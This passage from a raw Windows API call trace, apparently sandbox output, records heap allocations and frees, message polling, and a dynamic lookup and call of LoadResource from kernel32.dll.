(HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.053] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff78 | out: hHeap=0x12c0000) returned 1 [0129.054] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0129.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0129.054] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fffc8 [0129.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.054] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.054] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300360 [0129.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0129.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0129.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fffc8 | out: hHeap=0x12c0000) returned 1 [0129.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300360 | out: hHeap=0x12c0000) returned 1 [0129.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0129.055] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df00 | out: hHeap=0x12c0000) returned 1 [0129.055] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0129.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0129.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0129.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0129.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0129.056] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0129.056] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13000e0 [0129.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0129.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0129.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0129.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0129.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0129.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300360 [0129.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe20 [0129.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6770 [0129.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13000e0 | out: hHeap=0x12c0000) returned 1 [0129.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300360 | out: hHeap=0x12c0000) returned 1 [0129.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0129.058] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6770 | out: hHeap=0x12c0000) returned 1 [0129.058] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.058] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.058] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0129.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0129.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0129.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0129.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0129.059] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.059] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0129.059] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe50 [0129.059] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0129.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0129.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0129.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0129.060] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0129.060] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe40 [0129.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0129.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.060] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0129.060] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.060] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e280 | out: hHeap=0x12c0000) returned 1 [0129.060] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe50 [0129.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0129.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0129.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0129.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0129.061] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.061] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0129.061] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0129.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0129.061] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0129.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0129.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0129.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0129.062] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0129.062] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0129.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.062] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0129.062] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0129.063] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0129.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.063] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0129.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0129.063] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001f8 [0129.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6770 [0129.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0129.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0129.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe60 [0129.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0129.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe60 | out: hHeap=0x12c0000) returned 1 [0129.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6aa0 [0129.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69c8 [0129.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a28 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6908 [0129.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6998 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68d8 [0129.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69b0 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.065] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ab8 [0129.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69e0 [0129.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0129.066] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe00 [0129.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a40 [0129.066] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0129.066] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0129.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe70 [0129.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe80 [0129.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0129.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0129.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0129.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0129.068] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0129.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13002e8 [0129.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0129.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0129.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0129.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe40 [0129.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a70 [0129.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0129.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a70 | out: hHeap=0x12c0000) returned 1 [0129.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0129.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0129.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0129.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe80 [0129.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0129.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a70 [0129.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0129.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0129.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a70 | out: hHeap=0x12c0000) returned 1 [0129.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0129.070] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0129.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0129.070] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadResource", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14b6a58 [0129.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LoadResource", cchWideChar=13, lpMultiByteStr=0x14b6a58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LoadResource", lpUsedDefaultChar=0x0) returned 13 [0129.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0129.071] GetProcAddress (hModule=0x74650000, lpProcName="LoadResource") returned 0x746676f0 [0129.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0129.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fffa0 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdf0 [0129.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.072] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fffa0 | out: hHeap=0x12c0000) returned 1 [0129.072] LoadResource (hModule=0x0, hResInfo=0xfe76b8) returned 0x10bb1ac [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1314a78 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b6830 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6848 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0129.072] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd30 [0129.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0129.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0129.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67e8 [0129.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0129.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0129.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe70 [0129.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0129.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0129.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0129.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6818 [0129.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6860 [0129.073] RtlAllocateHeap (HeapHandle=0x12c0000, 